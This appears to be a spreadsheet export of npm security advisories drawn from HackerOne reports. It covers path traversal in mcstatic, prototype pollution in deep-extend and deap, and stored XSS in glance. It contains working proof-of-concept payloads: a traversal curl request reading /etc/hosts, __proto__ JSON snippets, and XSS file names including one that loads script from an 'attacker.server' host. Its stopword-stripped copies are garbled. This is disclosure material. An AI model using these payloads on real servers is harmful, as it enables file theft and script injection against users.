        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;responseHandlers&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;handleGet&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;stats&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;nextHandler&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;handleGet&lt;/code&gt; maps to &lt;code&gt;streamResponse&lt;/code&gt; in &lt;code&gt;responseHanders.js&lt;/code&gt;:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// node_modules/mcstatic/lib/responseHandlers.js, line 22:&lt;/span&gt;
&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;streamResponse&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;stat&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;stream&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;createReadStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setHeader&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;content-length&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;stat&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;size&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;stream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;pipe&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;stream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;on&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;error&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;statusHandlers&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;500&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;](&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;error&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;err&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="nx"&gt;stream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;on&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;end&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;statusCode&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;end&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can see (line 23) that &lt;code&gt;stream&lt;/code&gt; is created directly from &lt;code&gt;file&lt;/code&gt; and piped to &lt;code&gt;res&lt;/code&gt; response object.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;mcstatic&lt;/code&gt;:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install mcstatic
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run &lt;code&gt;mcstatic&lt;/code&gt; in direcotry of your choice:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;me:~/playground/hackerone/Node$ ./node_modules/mcstatic/bin/mcstatic 
mcstatic serving ./ on port 8080
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;execute following &lt;code&gt;curl&lt;/code&gt; command (adjust number of ../ to reflect your system):&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl -v --path-as-is http://127.0.0.1:8080/../../../../../etc/hosts
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;see result:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
&amp;gt; GET /../../../../../etc/hosts HTTP/1.1
&amp;gt; Host: 127.0.0.1:8080
&amp;gt; User-Agent: curl/7.47.0
&amp;gt; Accept: */*
&amp;gt; 
&amp;lt; HTTP/1.1 200 OK
&amp;lt; last-modified: Tue, 23 Jan 2018 14:51:52 GMT
&amp;lt; content-length: 188
&amp;lt; content-type: application/octet-stream
&amp;lt; Date: Tue, 06 Feb 2018 15:40:51 GMT
&amp;lt; Connection: keep-alive
&amp;lt; 
127.0.0.1   localhost
127.0.1.1   LT0081U2
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
* Connection #0 to host 127.0.0.1 left intact
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Ubuntu 16.04 LTS&lt;/li&gt;
&lt;li&gt;Chromium 66.0.3333.0 (Developer Build) (64-bit) &lt;/li&gt;
&lt;li&gt;Node.js version: v8.9.4 LTS&lt;/li&gt;
&lt;li&gt;npm version: 5.6.0&lt;/li&gt;
&lt;li&gt;curl 7.47.0&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Please feel free to invite module maintainer to this report. I haven&amp;#39;t contacted maintainer as I want to keep the process of fixing and disclosing bug consistent through HackerOne platform only.&lt;/p&gt;
&lt;p&gt;I hope my report will help to keep Node.js ecosystem and its users safe in the future.&lt;/p&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Rafal &amp;#39;bl4de&amp;#39; Janicki&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;This vulnerability allows to read content of any file on the server where module is run.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-06T15:43:16.553Z</t>
  </si>
  <si>
    <t>2018-04-24T19:46:53.316Z</t>
  </si>
  <si>
    <t>This vulnerability allows to read content of any file on the server where module is run.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,  Path Traversal mcstatic module. allows read content arbitrary files remote server.  Module  mcstatic  general file server made nodejs. will easy access files server browser.  https //www.npmjs.com/package/mcstatic  version  0.0.20  Stats 0 downloads last day 38 downloads last week 150 downloads last month  ~1800 estimated downloads per year  Description  Lack file path sanitization causes file server read malicious user.  follow code flow, find first file name read check exists  // node_modules/mcstatic/lib/staticFileHandler.js, line 19      var filePath = httpHelpers.getRequestPathFromUrl(req.url);     var mockedFilePath = findMockFilePath(filePath,mockPaths);     if(mockedFilePath)         filePath = mockedFilePath;      var file = path.normalize(path.join(root,filePath));     fs.stat(file,function(error, stats){         if(error)             return statusHandlers[500](res, nextHandler, { error  error });  Depends HTTP method used, handler function called (here"s GET)  // node_modules/mcstatic/lib/staticFileHandler.js, line 39  (req.method === "GET")         return responseHandlers.handleGet(res,file, stats, nextHandler);  handleGet maps streamResponse  // node_modules/mcstatic/lib/responseHandlers.js, line 22  var streamResponse = function(res, file, stat, next){     var stream = fs.createReadStream(file);     res.setHeader("content length", stat.size);      stream.pipe(res);     stream.on("error", function (err) {         statusHandlers["500"](res, next, { error  err });     });      stream.on("end", function () {         = 200;         res.end();     }); };  (line 23) stream created directly file piped res response object.  Steps Reproduce    install mcstatic   $ npm install mcstatic   run mcstatic direcotry choice   ~/playground/hackerone/Node$ ./node_modules/mcstatic/bin/mcstatic  mcstatic serving ./ port 8080   execute following curl command (adjust number ../ reflect system)   $ curl  v   path http //127.0.0.1 8080/../../../../../etc/hosts   result   *   Trying 127.0.0.1... * Connected (127.0.0.1) port 8080 (#0)   /../../../../../etc/hosts HTTP/1.1   Host  8080   User Agent  curl/7.47.0   Accept  */*    &lt; HTTP/1.1 200 OK &lt; last modified  Tue, 23 Jan 2018 14 51 52 GMT &lt; content length  188 &lt; content type  application/octet stream &lt; Date  Tue, 06 Feb 2018 15 40 51 GMT &lt; Connection  keep alive &lt;    localhost   LT0081U2  # following lines desirable IPv6 capable hosts   1     localhost ip6 localhost ip6 loopback ff02  1 ip6 allnodes ff02  2 ip6 allrouters * Connection #0 host left intact  Supporting Material/References    Ubuntu 16.04 LTS Chromium 66.0.3333.0 (Developer Build) (64 bit)  version  v8.9.4 LTS npm version  5.6.0 curl 7.47.0   Please feel free invite module maintainer report. haven"t contacted maintainer want keep process fixing disclosing bug consistent HackerOne platform only.  hope report will help keep ecosystem its users safe future.  Regards,  Rafal "bl4de" Janicki  Impact  vulnerability allows read content file server module run. </t>
  </si>
  <si>
    <t>vulnerability allows read content file server module run.</t>
  </si>
  <si>
    <t>Prototype pollution attack (deep-extend)</t>
  </si>
  <si>
    <t>/advisories/612</t>
  </si>
  <si>
    <t>2018-04-25T06:13:13.134+00:00</t>
  </si>
  <si>
    <t>deep-extend</t>
  </si>
  <si>
    <t>https://www.npmjs.com/deep-extend</t>
  </si>
  <si>
    <t>&lt;=0.5.0</t>
  </si>
  <si>
    <t>&gt;=0.5.1</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/311333.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As discussed in &lt;a href="/reports/309391"&gt;#309391&lt;/a&gt;, here&amp;#39;s the separate report for each of the library. This one is the information for the deep-extend library.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt; &lt;br&gt;
&lt;a href="/redirect?signature=58f0ebdfe174e10e4045aac65c1183a71ccfd8ce&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fdeep-extend" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;deep-extend&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Utilities function in all the listed modules can be tricked into modifying the prototype of &amp;quot;Object&amp;quot; when the attacker control part of the structure passed to these function. This can let an attacker add or modify existing property that will exist on all object.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; &lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;The simplest test case to reproduce the issue is the following code snippet. In the code snippet, &amp;quot;malicious_payload&amp;quot; would come from an endpoint which accepts JSON data.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;var merge = require(&amp;#39;deep-extend&amp;#39;);&lt;br&gt;
var malicious_payload = &amp;#39;{&amp;quot;__proto__&amp;quot;:{&amp;quot;oops&amp;quot;:&amp;quot;It works !&amp;quot;}}&amp;#39;;&lt;/p&gt;
&lt;p&gt;var a = {};&lt;br&gt;
console.log(&amp;quot;Before : &amp;quot; + a.oops);&lt;br&gt;
merge({},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guaranteed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guaranteed, but more significant impact like remote code execution can be achieved in some cases.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-01T14:01:37.813Z</t>
  </si>
  <si>
    <t>2018-04-15T18:32:32.220Z</t>
  </si>
  <si>
    <t>This vulnerability is guaranteed to at least obtain denial of service as all the library allow the property "toString" and "valueOf" to be replaced by a "String". This breaks the express module and forces the server to either crash or return a 500 to every subsequent request.Variable. Server crash or the server becoming unable to respond to all request is guaranteed, but more significant impact like remote code execution can be achieved in some cases.</t>
  </si>
  <si>
    <t xml:space="preserve">discussed #309391, here"s separate report library. one information deep extend library.  Module   deep extend  Summary   Utilities function listed modules tricked modifying prototype Â« Â»ObjectÂ« Â» when attacker control part structure passed function. let attacker add modify existing property will exist object.  Description    Steps Reproduce   simplest test case reproduce issue following code snippet. code snippet, Â« Â»malicious_payloadÂ« Â» endpoint accepts JSON data.   var merge = require("deep extend"); var malicious_payload = "{Â« Â»__proto__Â« Â» {Â« Â»oopsÂ« Â» Â« Â»It works  Â« Â»}}";  var = {}; console.log(Â« Â»Before   Â« Â» + a.oops); merge({}, JSON.parse(malicious_payload)); console.log(Â« Â»After   Â« Â» + a.oops);   shows attacker add attributes existing object server. Additional attribute used change execution code flow cause error every subsequent request replacing Â« Â»toStringÂ« Â» Â« Â»valueOfÂ« Â».  Impact   vulnerability guaranteed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guaranteed, significant impact remote code execution achieved cases. </t>
  </si>
  <si>
    <t>vulnerability guaranteed least obtain denial service library allow property "toString" "valueOf" replaced "String". breaks express module forces server either crash return 500 every subsequent request.Variable. Server crash server becoming unable respond request guaranteed, significant impact remote code execution achieved cases.</t>
  </si>
  <si>
    <t>Prototype pollution attack (deap)</t>
  </si>
  <si>
    <t>/advisories/611</t>
  </si>
  <si>
    <t>2018-04-25T06:07:30.179+00:00</t>
  </si>
  <si>
    <t>deap</t>
  </si>
  <si>
    <t>https://www.npmjs.com/deap</t>
  </si>
  <si>
    <t>&lt;1.0.1</t>
  </si>
  <si>
    <t>&gt;=1.0.1</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/310446.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As discussed in &lt;a href="/reports/309391"&gt;#309391&lt;/a&gt;, here&amp;#39;s the separate report for each of the library. This one is the information for the deap library.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="/redirect?signature=e32d22931e7c2ae16f60392e8361f760da1e7b02&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fdeap" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;deap&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Utilities function in all the listed modules can be tricked into modify the prototype of &amp;quot;Object&amp;quot; when the attacker control part of the structure passed to these function. This can let an attacker add or modify existing property that will exist on all object.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; &lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;The simplest test case to reproduce the issue is the following code snippet. In the code snippet, &amp;quot;malicious_payload&amp;quot; would come from an endpoint which accepts JSON data. The test case also works with the &amp;quot;deap.extend&amp;quot; function, the &amp;quot;deap&amp;quot; function and the &amp;quot;deap.clone&amp;quot; function.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;var deap= require(&amp;#39;deap&amp;#39;);&lt;br&gt;
var malicious_payload = &amp;#39;{&amp;quot;__proto__&amp;quot;:{&amp;quot;oops&amp;quot;:&amp;quot;It works !&amp;quot;}}&amp;#39;;&lt;/p&gt;
&lt;p&gt;var a = {};&lt;br&gt;
console.log(&amp;quot;Before : &amp;quot; + a.oops);&lt;br&gt;
deap.merge({},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garanteed, but more significant impact like remote code execution can be achieved in some cases.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-30T06:39:57.022Z</t>
  </si>
  <si>
    <t>2018-04-15T18:32:24.134Z</t>
  </si>
  <si>
    <t>This vulnerability is garanteed to at least obtain denial of service as all the library allow the property "toString" and "valueOf" to be replaced by a "String". This breaks the express module and forces the server to either crash or return a 500 to every subsequent request.Variable. Server crash or the server becoming unable to respond to all request is garanteed, but more significant impact like remote code execution can be achieved in some cases.</t>
  </si>
  <si>
    <t xml:space="preserve">discussed #309391, here"s separate report library. one information deap library.  Module   deap  Summary   Utilities function listed modules tricked modify prototype Â« Â»ObjectÂ« Â» when attacker control part structure passed function. let attacker add modify existing property will exist object.  Description    Steps Reproduce   simplest test case reproduce issue following code snippet. code snippet, Â« Â»malicious_payloadÂ« Â» endpoint accepts JSON data. test case works Â« Â»deap.extendÂ« Â» function, Â« Â»deapÂ« Â» function Â« Â»deap.cloneÂ« Â» function.   var deap= require("deap"); var malicious_payload = "{Â« Â»__proto__Â« Â» {Â« Â»oopsÂ« Â» Â« Â»It works  Â« Â»}}";  var = {}; console.log(Â« Â»Before   Â« Â» + a.oops); deap.merge({}, JSON.parse(malicious_payload)); console.log(Â« Â»After   Â« Â» + a.oops);   shows attacker add attributes existing object server. Additional attribute used change execution code flow cause error every subsequent request replacing Â« Â»toStringÂ« Â» Â« Â»valueOfÂ« Â».  Impact   vulnerability garanteed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garanteed, significant impact remote code execution achieved cases. </t>
  </si>
  <si>
    <t>vulnerability garanteed least obtain denial service library allow property "toString" "valueOf" replaced "String". breaks express module forces server either crash return 500 every subsequent request.Variable. Server crash server becoming unable respond request garanteed, significant impact remote code execution achieved cases.</t>
  </si>
  <si>
    <t>[glance] Stored XSS via file name allows to run arbitrary JavaScript when directory listing is displayed in browser</t>
  </si>
  <si>
    <t>/advisories/610</t>
  </si>
  <si>
    <t>2018-04-25T05:48:39.733+00:00</t>
  </si>
  <si>
    <t>glance</t>
  </si>
  <si>
    <t>https://www.npmjs.com/glance</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/310133.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys,&lt;/p&gt;
&lt;p&gt;There is a Stored XSS vulnerability in &lt;code&gt;glance&lt;/code&gt; module. File name, which contains malicious HTML (eg. embedded &lt;code&gt;iframe&lt;/code&gt; element or &lt;code&gt;javascript:&lt;/code&gt; pseudoprotocol handler in &lt;code&gt;&amp;lt;a&amp;gt;&lt;/code&gt; element) allows to execute JavaScript code against any user who opens directory listing contains such crafted file name. &lt;/p&gt;
&lt;h2 id="module"&gt;Module&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;glance&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;a quick disposable http server for static files&lt;/p&gt;
&lt;p&gt;&lt;a title="https://www.npmjs.com/package/glance" href="/redirect?signature=a00416ffdecf4198aebe10c315915e053160eab0&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fglance" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/glance&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Stats&lt;br&gt;
33 downloads in the last day&lt;br&gt;
34 downloads in the last week&lt;br&gt;
269 downloads in the last month&lt;/p&gt;
&lt;p&gt;~3000 estimated downloads per year&lt;/p&gt;
&lt;h2 id="description"&gt;Description&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;glance&lt;/code&gt; serves files from the server where was installed. Because there is no file names sanitization, following names can be used:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;example file name 1: iframe element serving HTML file with malicious JavaScript fired when iframe loads its content:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;quot;&amp;gt;&amp;lt;iframe=&amp;quot;malicious_frame.html&amp;quot;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;malicious_iframe.html&lt;/code&gt; example:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;meta charset=&amp;quot;utf8&amp;quot; /&amp;gt;
    &amp;lt;title&amp;gt;Frame embeded with malware :P&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;p&amp;gt;iframe element with malicious code&amp;lt;/p&amp;gt;
    &amp;lt;script type=&amp;quot;text/javascript&amp;quot; src=&amp;quot;http://attacker.server/malware.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;example file name 2: inline &lt;code&gt;javascript:&lt;/code&gt; pseudo protocol event handler:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;javascript:alert(&amp;#39;you are pwned!&amp;#39;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When user clicks on this file, instead of seeing its content, malicious JavaScript is executed&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;glance&lt;/code&gt;:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install glance
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;in directory which will be served via &lt;code&gt;glance&lt;/code&gt;, put file with following name:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;javascript:alert(&amp;#39;you are pwned!&amp;#39;)
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run &lt;code&gt;glance&lt;/code&gt; in selected direcotry:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;me:~/playground/hackerone/Node$ ./node_modules/glance/bin/glance.js --verbose --dir ./
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You will see list of files. Now, click file with &lt;code&gt;javascript:alert(&amp;#39;you are pwned!&amp;#39;)&lt;/code&gt; name.&lt;br&gt;
JavaScript is executed and popup is fired:&lt;/p&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="glancexss.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/258/419/5b0192d217a6f157bed646e56de7f937dc5d7dab/glancexss.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIZ26ZMKPQLNXZHRA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFkaDB%2Fv%2BN9SSpwpVea%2FKCK3A%2BSuBzuhTrhwR5nEi3I0b11mgtOz%2B%2FirUFG2jha6LAKQkkZHoxw1C%2Fif82UJl2RRNsWJVfyI5zUoH2Bxp3RDtIyvtQTzNq4y46c83kyLiVIEPnDZkY7wOJXqSs3QbAMIs%2FurBeBmpBHX87ZgSbxKMyw85T8IW2LM99Aqn3IjrgZkQhyoqaJMI%2F735KwUH6L1MeAmq8SDjJHhgOzviNuCnL3POjNFnpn%2Fy9n5AhpZWHEViNXVr4gaN%2F9Ypp1l4L1edRKd58rsTZB8jheGLIC2VfOsKp8TzA2Zsn%2B6Uf1K2ievYdpP6f6o4ZcSeXipgj1wspbfE9hnc5KNW9Scq3uTZ0WKLWruX2JJlAlSh%2Bnd1DtaJvX1r2uGMfW19WX%2BtL1VTonXfgBVZRxsqJt3XgewH9mBtLLK1J0H2cWH%2FVUXCWY1bhDE5CDzwKQgemIz8YBYNxss8duiaxJPvlClq8F2twzPQBKwsvGzZxWCLPBOmigt54lT9y3FFHbFG8zyF%2FDP0cK%2BnL214WKIfIcJbuFEdqLi4muRSbH98bSkoeMN2H%2Ffv5CiQ5qKtimsbgxvrdut14nsk0yk5yoo9NHs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=975a3339abdcf460625b72c1cb2f01d7f93a8facec3a9f779145eb6964d47d98" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/258/419/5b0192d217a6f157bed646e56de7f937dc5d7dab/glancexss.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIZ26ZMKPQLNXZHRA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFkaDB%2Fv%2BN9SSpwpVea%2FKCK3A%2BSuBzuhTrhwR5nEi3I0b11mgtOz%2B%2FirUFG2jha6LAKQkkZHoxw1C%2Fif82UJl2RRNsWJVfyI5zUoH2Bxp3RDtIyvtQTzNq4y46c83kyLiVIEPnDZkY7wOJXqSs3QbAMIs%2FurBeBmpBHX87ZgSbxKMyw85T8IW2LM99Aqn3IjrgZkQhyoqaJMI%2F735KwUH6L1MeAmq8SDjJHhgOzviNuCnL3POjNFnpn%2Fy9n5AhpZWHEViNXVr4gaN%2F9Ypp1l4L1edRKd58rsTZB8jheGLIC2VfOsKp8TzA2Zsn%2B6Uf1K2ievYdpP6f6o4ZcSeXipgj1wspbfE9hnc5KNW9Scq3uTZ0WKLWruX2JJlAlSh%2Bnd1DtaJvX1r2uGMfW19WX%2BtL1VTonXfgBVZRxsqJt3XgewH9mBtLLK1J0H2cWH%2FVUXCWY1bhDE5CDzwKQgemIz8YBYNxss8duiaxJPvlClq8F2twzPQBKwsvGzZxWCLPBOmigt54lT9y3FFHbFG8zyF%2FDP0cK%2BnL214WKIfIcJbuFEdqLi4muRSbH98bSkoeMN2H%2Ffv5CiQ5qKtimsbgxvrdut14nsk0yk5yoo9NHs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=975a3339abdcf460625b72c1cb2f01d7f93a8facec3a9f779145eb6964d47d98" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Ubuntu 16.04 LTS&lt;/li&gt;
&lt;li&gt;Chromium 66.0.3333.0 (Developer Build) (64-bit) &lt;/li&gt;
&lt;li&gt;Node.js version: v8.9.4 LTS&lt;/li&gt;
&lt;li&gt;npm version: 5.6.0&lt;/li&gt;
&lt;li&gt;curl 7.47.0&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Please feel free to invite module maintainer to this report. I haven&amp;#39;t contacted maintainer as I want to keep the process of fixing and disclosing bug consistent through HackerOne platform only.&lt;/p&gt;
&lt;p&gt;I hope my report will help to keep Node.js ecosystem and its users safe in the future.&lt;/p&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Rafal &amp;#39;bl4de&amp;#39; Janicki&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;This vulnerability can be used by attacker to serve malicious JavaScript against any user.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-29T13:29:06.051Z</t>
  </si>
  <si>
    <t>2018-04-15T18:32:20.408Z</t>
  </si>
  <si>
    <t>This vulnerability can be used by attacker to serve malicious JavaScript against any user.</t>
  </si>
  <si>
